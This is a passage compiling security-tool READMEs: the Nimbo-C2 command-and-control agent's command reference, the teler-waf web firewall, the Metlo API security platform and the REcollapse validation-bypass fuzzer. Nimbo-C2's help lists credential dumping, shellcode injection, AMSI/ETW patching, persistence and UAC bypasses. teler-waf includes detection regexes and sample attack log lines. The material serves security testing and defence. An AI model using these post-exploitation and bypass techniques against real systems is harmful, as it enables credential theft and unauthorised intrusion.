    lsass <method> -> dump lsass.exe [methods: direct,comsvcs] (elevation required)
    sam -> dump sam,security,system hives using reg.exe (elevation required)
    shellc <raw-shellcode-file> <pid> -> inject shellcode to remote process
    assembly <local-assembly> <args> -> execute .net assembly (pass all args as a single string using quotes)
    warning: make sure the assembly doesn't call any exit function

    --== Evasion Stuff ==--
    unhook -> unhook ntdll.dll
    amsi -> patch amsi out of the current process
    etw -> patch etw out of the current process

    --== Persistence Stuff ==--
    persist run <command> <key-name> -> set run key (will try first hklm, then hkcu)
    persist spe <command> <process-name> -> persist using silent process exit technique (elevation required)

    --== Privesc Stuff ==--
    uac fodhelper <command> <keep/die> -> elevate session using the fodhelper uac bypass technique
    uac sdclt <command> <keep/die> -> elevate session using the sdclt uac bypass technique

    --== Interaction stuff ==--
    msgbox <title> <text> -> pop a message box (blocking! waits for enter press)
    speak <text> -> speak using sapi.spvoice com interface

    --== Communication Stuff ==--
    sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
    clear -> clear pending commands
    collect -> recollect agent data
    kill -> kill the agent (persistence will still take place)

    --== General ==--
    show -> show agent details
    back -> back to main screen
    cls -> clear the screen
    help -> print this help message
    exit -> exit Nimbo-C2

    Linux agent

    Nimbo-2 [51a33cb9] > help

    --== Send Commands ==--
    cmd <shell-command> -> execute a terminal command

    --== File Stuff ==--
    download <remote-file> -> download a file from the agent (wrap path with quotes)
    upload <local-file> <remote-path> -> upload a file to the agent (wrap paths with quotes)

    --== Post Exploitation Stuff ==--
    memfd <mode> <elf-file> <commandline> -> load elf in-memory using the memfd_create syscall
    implant mode: load the elf as a child process and return
    task mode: load the elf as a child process, wait on it, and get its output when it's done
    (pass the whole commandline as a single string using quotes)

    --== Communication Stuff ==--
    sleep <sleep-time> <jitter-%> -> change sleep time interval and jitter
    clear -> clear pending commands
    collect -> recollect agent data
    kill -> kill the agent (persistence will still take place)

    --== General ==--
    show -> show agent details
    back -> back to main screen
    cls -> clear the screen
    help -> print this help message
    exit -> exit Nimbo-C2

    Limitations & Warnings

    • Even though the HTTP communication is encrypted, the 'user-agent' header is in plain text and it carries the real agent id, which some products may flag it suspicious.
    • When using assembly command, make sure your assembly doesn't call any exit function because it will kill the agent.
    • shellc command may unexpectedly crash or change the injected process behavior, test the shellcode and the target process first.
    • audio, lsass and sam commands temporarily save artifacts to disk before exfiltrate and delete them.
    • Cleaning the persist commands should be done manually.
    • Specify whether to keep or kill the initiating agent process in the uac commands. die flag may leave you with no active agent (if the unelevated agent thinks that the UAC bypass was successful, and it wasn't), keep should leave you with 2 active agents probing the C2, then you should manually kill the unelevated.
    • msgbox is blocking, until the user will press the ok button.

    Contribution

    This software may be buggy or unstable in some use cases as it not being fully and constantly tested. Feel free to open issues, PR's, and contact me for any reason at (Gmail | Linkedin | Twitter).

    Credits

    • OffensiveNim - Great resource that taught me a lot about leveraging Nim for implant tasks. Some of Nimbo-C2 agent capabilities are basically wrappers around OffensiveNim modified examples.
    • Python-Prompt-Toolkit-3 - Awsome library for developing python CLI applications. Developed the Nimbo-C2 interactive console using this.
    • ascii-image-converter - For the awsome Nimbo ascii art.
    • All those random people from Github & Stackoverflow that I copy & pasted their code
      .


    Teler-Waf - A Go HTTP Middleware That Provides Teler IDS Functionality To Protect Against Web-Based Attacks And Improve The Security Of Go-based Web Applications

    By: Zion3R

    teler-waf is a comprehensive security solution for Go-based web applications. It acts as an HTTP middleware, providing an easy-to-use interface for integrating IDS functionality with teler IDS into existing Go applications. By using teler-waf, you can help protect against a variety of web-based attacks, such as cross-site scripting (XSS) and SQL injection.

    The package comes with a standard net/http.Handler, making it easy to integrate into your application's routing. When a client makes a request to a route protected by teler-waf, the request is first checked against the teler IDS to detect known malicious patterns. If no malicious patterns are detected, the request is then passed through for further processing.

    In addition to providing protection against web-based attacks, teler-waf can also help improve the overall security and integrity of your application. It is highly configurable, allowing you to tailor it to fit the specific needs of your application.


    See also:

    • kitabisa/teler: Real-time HTTP intrusion detection.
    • dwisiswant0/cox: Cox is bluemonday-wrapper to perform a deep-clean and/or sanitization of (nested-)interfaces from HTML to prevent XSS payloads.

    Features

    Some core features of teler-waf include:

    • HTTP middleware for Go web applications.
    • Integration of teler IDS functionality.
    • Detection of known malicious patterns using the teler IDS.
      • Common web attacks, such as cross-site scripting (XSS) and SQL injection, etc.
      • CVEs, covers known vulnerabilities and exploits.
      • Bad IP addresses, such as those associated with known malicious actors or botnets.
      • Bad HTTP referers, such as those that are not expected based on the application's URL structure or are known to be associated with malicious actors.
      • Bad crawlers, covers requests from known bad crawlers or scrapers, such as those that are known to cause performance issues or attempt to extract sensitive information from the application.
      • Directory bruteforce attacks, such as by trying common directory names or using dictionary attacks.
    • Configuration options to whitelist specific types of requests based on their URL or headers.
    • Easy integration with many frameworks.
    • High configurability to fit the specific needs of your application.

    Overall, teler-waf provides a comprehensive security solution for Go-based web applications, helping to protect against web-based attacks and improve the overall security and integrity of your application.

    Install

    To install teler-waf in your Go application, run the following command to download and install the teler-waf package:

    go get github.com/kitabisa/teler-waf

    Usage

    Here is an example of how to use teler-waf in a Go application:

    1. Import the teler-waf package in your Go code:
    import "github.com/kitabisa/teler-waf"
    1. Use the New function to create a new instance of the Teler type. This function takes a variety of optional parameters that can be used to configure teler-waf to suit the specific needs of your application.
    waf := teler.New()
    1. Use the Handler method of the Teler instance to create a net/http.Handler. This handler can then be used in your application's HTTP routing to apply teler-waf's security measures to specific routes.
    handler := waf.Handler(http.HandlerFunc(yourHandlerFunc))
    1. Use the handler in your application's HTTP routing to apply teler-waf's security measures to specific routes.
    http.Handle("/path", handler)

    That's it! You have configured teler-waf in your Go application.

    Options:

    For a list of the options available to customize teler-waf, see the teler.Options struct.

    Examples

    Here is an example of how to customize the options and rules for teler-waf:

    // main.go
    package main

    import (
    "net/http"

    "github.com/kitabisa/teler-waf"
    "github.com/kitabisa/teler-waf/request"
    "github.com/kitabisa/teler-waf/threat"
    )

    var myHandler = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
    // This is the handler function for the route that we want to protect
    // with teler-waf's security measures.
    w.Write([]byte("hello world"))
    })

    var rejectHandler = http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
    // This is the handler function for the route that we want to be rejected
    // if the teler-waf's security measures are triggered.
    http.Error(w, "Sorry, your request has been denied for security reasons.", http.StatusForbidden)
    })

    func main() {
    // Create a new instance of the Teler type using the New function
    // and configure it using the Options struct.
    telerMiddleware := teler.New(tel er.Options{
    // Exclude specific threats from being checked by the teler-waf.
    Excludes: []threat.Threat{
    threat.BadReferrer,
    threat.BadCrawler,
    },
    // Specify whitelisted URIs (path & query parameters), headers,
    // or IP addresses that will always be allowed by the teler-waf.
    Whitelists: []string{
    `(curl|Go-http-client|okhttp)/*`,
    `^/wp-login\.php`,
    `(?i)Referer: https?:\/\/www\.facebook\.com`,
    `192\.168\.0\.1`,
    },
    // Specify custom rules for the teler-waf to follow.
    Customs: []teler.Rule{
    {
    // Give the rule a name for easy identification.
    Name: "Log4j Attack",
    // Specify the logical operator to use when evaluating the rule's conditions.
    Condition: "or",
    // Specify the conditions that must be met for the rule to trigger.
    Rules: []teler.Condition{
    {
    // Specify the HTTP method that the rule applies to.
    Method: request.GET,
    // Specify the element of the request that the rule applies to
    // (e.g. URI, headers, body).
    Element: request.URI,
    // Specify the pattern to match against the element of the request.
    Pattern: `\$\{.*:\/\/.*\/?\w+?\}`,
    },
    },
    },
    },
    // Specify the file path to use for logging.
    LogFile: "/tmp/teler.log",
    })

    // Set the rejectHandler as the handler for the telerMiddleware.
    telerMiddleware.SetHandler(rejectHandler)

    // Create a new handler using the handler method of the Teler instance
    // and pass in the myHandler function for the route we want to protect.
    app := telerMiddleware.Handler(myHandler)

    // Use the app handler as the handler for the route.
    http.ListenAndServe("127.0.0.1:3000", app)
    }

    Warning: When using a whitelist, any request that matches it - regardless of the type of threat it poses, it will be returned without further analysis.

    To illustrate, suppose you set up a whitelist to permit requests containing a certain string. In the event that a request contains that string, but /also/ includes a payload such as an SQL injection or cross-site scripting ("XSS") attack, the request may not be thoroughly analyzed for common web attack threats and will be swiftly returned. See issue #25.

    For more examples of how to use teler-waf or integrate it with any framework, take a look at examples/ directory.

    Development

    By default, teler-waf caches all incoming requests for 15 minutes & clear them every 20 minutes to improve the performance. However, if you're still customizing the settings to match the requirements of your application, you can disable caching during development by setting the development mode option to true. This will prevent incoming requests from being cached and can be helpful for debugging purposes.

    // Create a new instance of the Teler type using
    // the New function & enable development mode option.
    telerMiddleware := teler.New(teler.Options{
    Development: true,
    })

    Logs

    Here is an example of what the log lines would look like if teler-waf detects a threat on a request:

    {"level":"warn","ts":1672261174.5995026,"msg":"bad crawler","id":"654b85325e1b2911258a","category":"BadCrawler","request":{"method":"GET","path":"/","ip_addr":"127.0.0.1:37702","headers":{"Accept":["*/*"],"User-Agent":["curl/7.81.0"]},"body":""}}
    {"level":"warn","ts":1672261175.9567692,"msg":"directory bruteforce","id":"b29546945276ed6b1fba","category":"DirectoryBruteforce","request":{"method":"GET","path":"/.git","ip_addr":"127.0.0.1:37716","headers":{"Accept":["*/*"],"User-Agent":["X"]},"body":""}}
    {"level":"warn","ts":1672261177.1487508,"msg":"Detects common comment types","id":"75412f2cc0ec1cf79efd","category":"CommonWebAttack","request":{"method":"GET","path":"/?id=1%27% 20or%201%3D1%23","ip_addr":"127.0.0.1:37728","headers":{"Accept":["*/*"],"User-Agent":["X"]},"body":""}}

    The id is a unique identifier that is generated when a request is rejected by teler-waf. It is included in the HTTP response headers of the request (X-Teler-Req-Id), and can be used to troubleshoot issues with requests that are being made to the website.

    For example, if a request to a website returns an HTTP error status code, such as a 403 Forbidden, the teler request ID can be used to identify the specific request that caused the error and help troubleshoot the issue.

    Teler request IDs are used by teler-waf to track requests made to its web application and can be useful for debugging and analyzing traffic patterns on a website.

    Datasets

    The teler-waf package utilizes a dataset of threats to identify and analyze each incoming request for potential security threats. This dataset is updated daily, which means that you will always have the latest resource. The dataset is initially stored in the user-level cache directory (on Unix systems, it returns $XDG_CACHE_HOME/teler-waf as specified by XDG Base Directory Specification if non-empty, else $HOME/.cache/teler-waf. On Darwin, it returns $HOME/Library/Caches/teler-waf. On Windows, it returns %LocalAppData%/teler-waf. On Plan 9, it returns $home/lib/cache/teler-waf) on your first launch. Subsequent launch will utilize the cached dataset, rather than downloading it again.

    Note: The threat datasets are obtained from the kitabisa/teler-resources repository.

    However, there may be situations where you want to disable automatic updates to the threat dataset. For example, you may have a slow or limited internet connection, or you may be using a machine with restricted file access. In these cases, you can set an option called NoUpdateCheck to true, which will prevent the teler-waf from automatically updating the dataset.

    // Create a new instance of the Teler type using the New
    // function & disable automatic updates to the threat dataset.
    telerMiddleware := teler.New(teler.Options{
    NoUpdateCheck: true,
    })

    Finally, there may be cases where it's necessary to load the threat dataset into memory rather than saving it to a user-level cache directory. This can be particularly useful if you're running the application or service on a distroless or runtime image, where file access may be limited or slow. In this scenario, you can set an option called InMemory to true, which will load the threat dataset into memory for faster access.

    // Create a new instance of the Teler type using the
    // New function & enable in-memory threat datasets store.
    telerMiddleware := teler.New(teler.Options{
    InMemory: true,
    })

    Warning: This may also consume more system resources, so it's worth considering the trade-offs before making this decision.

    Resources

    Security

    If you discover a security issue, please bring it to their attention right away, we take security seriously!

    Reporting a Vulnerability

    If you have information about a security issue, or vulnerability in this teler-waf package, and/or you are able to successfully execute such as cross-site scripting (XSS) and pop-up an alert in our demo site (see resources), please do NOT file a public issue — instead, kindly send your report privately via the vulnerability report form or to our official channels as per our security policy.

    Limitations

    Here are some limitations of using teler-waf:

    • Performance overhead: teler-waf may introduce some performance overhead, as the teler-waf will need to process each incoming request. If you have a high volume of traffic, this can potentially slow down the overall performance of your application significantly, especially if you enable the CVEs threat detection. See benchmark below:
    $ go test -bench . -cpu=4
    goos: linux
    goarch: amd64
    pkg: github.com/kitabisa/teler-waf
    cpu: 11th Gen Intel(R) Core(TM) i9-11900H @ 2.50GHz
    BenchmarkTelerDefaultOptions-4 42649 24923 ns/op 6206 B/op 97 allocs/op
    BenchmarkTelerCommonWebAttackOnly-4 48589 23069 ns/op 5560 B/op 89 allocs/op
    BenchmarkTelerCVEOnly-4 48103 23909 ns/op 5587 B/op 90 allocs/op
    BenchmarkTelerBadIPAddressOnly-4 47871 22846 ns/op 5470 B/op 87 allocs/op
    BenchmarkTelerBadReferrerOnly-4 47558 23917 ns/op 5649 B/op 89 allocs/op
    BenchmarkTelerBadCrawlerOnly-4 42138 24010 ns/op 5694 B/op 86 allocs/op
    BenchmarkTelerDirectoryBruteforceOnly-4 45274 23523 ns/op 5657 B/op 86 allocs/op
    BenchmarkT elerCustomRule-4 48193 22821 ns/op 5434 B/op 86 allocs/op
    BenchmarkTelerWithoutCommonWebAttack-4 44524 24822 ns/op 6054 B/op 94 allocs/op
    BenchmarkTelerWithoutCVE-4 46023 25732 ns/op 6018 B/op 93 allocs/op
    BenchmarkTelerWithoutBadIPAddress-4 39205 25927 ns/op 6220 B/op 96 allocs/op
    BenchmarkTelerWithoutBadReferrer-4 45228 24806 ns/op 5967 B/op 94 allocs/op
    BenchmarkTelerWithoutBadCrawler-4 45806 26114 ns/op 5980 B/op 97 allocs/op
    BenchmarkTelerWithoutDirectoryBruteforce-4 44432 25636 ns/op 6185 B/op 97 allocs/op
    PASS
    ok github.com/kitabisa/teler-waf 25.759s

    Note: Benchmarking results may vary and may not be consistent. Those results were obtained when there were >1.5k CVE templates and the teler-resources dataset may have increased since then, which may impact the results.

    • Configuration complexity: Configuring teler-waf to suit the specific needs of your application can be complex, and may require a certain level of expertise in web security. This can make it difficult for those who are not familiar with application firewalls and IDS systems to properly set up and use teler-waf.
    • Limited protection: teler-waf is not a perfect security solution, and it may not be able to protect against all possible types of attacks. As with any security system, it is important to regularly monitor and maintain teler-waf to ensure that it is providing the desired level of protection.

    Known Issues

    To view a list of known issues with teler-waf, please filter the issues by the "known-issue" label.

    License

    This program is developed and maintained by members of Kitabisa Security Team, and this is not an officially supported Kitabisa product. This program is free software: you can redistribute it and/or modify it under the terms of the Apache license. Kitabisa teler-waf and any contributions are copyright © by Dwi Siswanto 2022-2023.



    Metlo - An Open-Source API Security Platform

    By: Zion3R

    Secure Your API.


    Metlo is an open-source API security platform

    With Metlo you can:

    • Create an Inventory of all your API Endpoints and Sensitive Data.
    • Detect common API vulnerabilities.
    • Proactively test your APIs before they go into production.
    • Detect API attacks in real time.

    Metlo does this by scanning your API traffic using one of our connectors and then analyzing trace data.


    There are three ways to get started with Metlo. Metlo Cloud, Metlo Self Hosted, and our Open Source product. We recommend Metlo Cloud for almost all users as it scales to 100s of millions of requests per month and all upgrades and migrations are managed for you.

    You can get started with Melto Cloud right away without a credit card. Just make an account on https://app.metlo.com and follow the instructions in our docs here.

    Although we highly recommend Metlo Cloud, if you're a large company or need an air-gapped system you can self host Metlo as well! Create an account on https://my.metlo.com and follow the instructions on our docs here to setup Metlo in your own Cloud environment.

    If you want to deploy our Open Source product we have instructions for AWS, GCP, Azure and Docker.

    You can also join our Discord community if you need help or just want to chat!

    Features

    • Endpoint Discovery - Metlo scans network traffic and creates an inventory of every single endpoint in your API.
    • Sensitive Data Scannning - Each endpoint is scanned for PII data and given a risk score.
    • Vulnerability Discovery - Get Alerts for issues like unauthenticated endpoints returning sensitive data, No HSTS headers, PII data in URL params, Open API Spec Diffs and more
    • API Security Testing - Build security tests directly in Metlo. Autogenerate tests for OWASP Top 10 vulns like BOLA, Broken Authentication, SQL Injection and more.
    • CI/CD Integration - Integrate with your CI/CD to find issues in development and staging.
    • Attack Detection - Our ML Algorithms build a model for baseline API behavior. Any deviation from this baseline is surfaced to your security team as soon as possible.
    • Attack Context - Metlo’s UI gives you full context around any attack to help quickly fix the vulnerability.

    Testing

    For tests that we can't autogenerate, our built in testing framework helps you get to 100% Security Coverage on your highest risk APIs. You can build tests in a yaml format to make sure your API is working as intendend.

    For example the following test checks for broken authentication:

    id: test-payment-processor-metlo.com-user-billing

    meta:
    name: test-payment-processor.metlo.com/user/billing Test Auth
    severity: CRITICAL
    tags:
    - BROKEN_AUTHENTICATION

    test:
    - request:
    method: POST
    url: https://test-payment-processor.metlo.com/user/billing
    headers:
    - name: Content-Type
    value: application/json
    - name: Authorization
    value: ...
    data: |-
    { "ccn": "...", "cc_exp": "...", "cc_code": "..." }
    assert:
    - key: resp.status
    value: 200
    - request:
    method: POST
    url: https://test-payment-processor.metlo.com/user/billing
    headers:
    - name: Content-Type
    value: application/json
    data: |-
    { "ccn": "...", "cc_exp": "...", "cc_code": "..." }
    assert:
    - key: resp.s tatus
    value: [ 401, 403 ]

    You can see more information on our docs.

    Why Metlo?

    Most businesses have adopted public facing APIs to power their websites and apps. This has dramatically increased the attack surface for your business. There’s been a 200% increase in API security breaches in just the last year with the APIs of companies like Uber, Meta, Experian and Just Dial leaking millions of records. It's obvious that tools are needed to help security teams make APIs more secure but there's no great solution on the market.

    Some solutions require you to go through sales calls to even try the product while others have you to send all your API traffic to their own cloud. Metlo is the first Open Source API security platform that you can self host, and get started for free right away!

    We're Hiring!

    We would love for you to come help us make Metlo better. Come join us at Metlo!

    Open-source vs. paid

    This repo is entirely MIT licensed. Features like user management, user roles and attack protection require an enterprise license. Contact us for more information.

    Development

    Checkout our development guide for more info on how to develop Metlo locally.



    REcollapse Is A Helper Tool For Black-Box Regex Fuzzing To Bypass Validations And Discover Normalizations In Web Applications

    By: Zion3R


    REcollapse is a helper tool for black-box regex fuzzing to bypass validations and discover normalizations in web applications.

    It can also be helpful to bypass WAFs and weak vulnerability mitigations. For more information, take a look at the REcollapse blog post.

    The goal of this tool is to generate payloads for testing. Actual fuzzing shall be done with other tools like Burp (intruder), ffuf, or similar.


    Installation

    Requirements: Python 3

    pip3 install --user --upgrade -r requirements.txt or ./install.sh

    Docker

    docker build -t recollapse . or docker pull 0xacb/recollapse


    Usage

    $ recollapse -h
    usage: recollapse [-h] [-p POSITIONS] [-e {1,2,3}] [-r RANGE] [-s SIZE] [-f FILE]
    [-an] [-mn MAXNORM] [-nt]
    [input]

    REcollapse is a helper tool for black-box regex fuzzing to bypass validations and
    discover normalizations in web applications

    positional arguments:
    input original input

    options:
    -h, --help show this help message and exit
    -p POSITIONS, --positions POSITIONS
    pivot position modes. Example: 1,2,3,4 (default). 1: starting,
    2: separator, 3: normalization, 4: termination
    -e {1,2,3}, --encoding {1,2,3}
    1: URL-encoded format (default), 2: Unicode format, 3: Raw
    format
    -r RANGE, --range RANGE
    range of bytes for fuzzing. Example: 0,0xff (default)
    -s SIZE, --size SIZE numb er of fuzzing bytes (default: 1)
    -f FILE, --file FILE read input from file
    -an, --alphanum include alphanumeric bytes in fuzzing range
    -mn MAXNORM, --maxnorm MAXNORM
    maximum number of normalizations (default: 3)
    -nt, --normtable print normalization table

    Detailed options explanation

    Let's consider this_is.an_example as the input.

    Positions

    1. Fuzz the beginning of the input: $this_is.an_example
    2. Fuzz the before and after special characters: this$_$is$.$an$_$example
    3. Fuzz normalization positions: replace all possible bytes according to the normalization table
    4. Fuzz the end of the input: this_is.an_example$

    Encoding

    1. URL-encoded format to be used with application/x-www-form-urlencoded or query parameters: %22this_is.an_example
    2. Unicode format to be used with application/json: \u0022this_is.an_example
    3. Raw format to be used with multipart/form-data: "this_is.an_example

    Range

    Specify a range of bytes for fuzzing: -r 1-127. This will exclude alphanumeric characters unless the -an option is provided.

    Size

    Specify the size of fuzzing for positions 1, 2 and 4. The default approach is to fuzz all possible values for one byte. Increasing the size will consume more resources and generate many more inputs, but it can lead to finding new bypasses.

    File

    Input can be provided as a positional argument, stdin, or a file through the -f option.

    Alphanumeric

    By default, alphanumeric characters will be excluded from output generation, which is usually not interesting in terms of responses. You can allow this with the -an option.

    Maximum number or normalizations

    Not all normalization libraries have the same behavior. By default, three possibilities for normalizations are generated for each input index, which is usually enough. Use the -mn option to go further.

    Normalization table

    Use the -nt option to show the normalization table.


    Example

    $ recollapse -e 1 -p 1,2,4 -r 10-11 https://legit.example.com
    %0ahttps://legit.example.com
    %0bhttps://legit.example.com
    https%0a://legit.example.com
    https%0b://legit.example.com
    https:%0a//legit.example.com
    https:%0b//legit.example.com
    https:/%0a/legit.example.com
    https:/%0b/legit.example.com
    https://%0alegit.example.com
    https://%0blegit.example.com
    https://legit%0a.example.com
    https://legit%0b.example.com
    https://legit.%0aexample.com
    https://legit.%0bexample.com
    https://legit.example%0a.com
    https://legit.example%0b.com
    https://legit.example.%0acom
    https://legit.example.%0bcom
    https://legit.example.com%0a
    https://legit.example.com%0b

    Resources

    This technique has been presented on BSidesLisbon 2022

    Blog post: https://0xacb.com/2022/11/21/recollapse/

    Slides:

    Videos:

    Normalization table: https://0xacb.com/normalization_table


    Thanks

    and



    ❌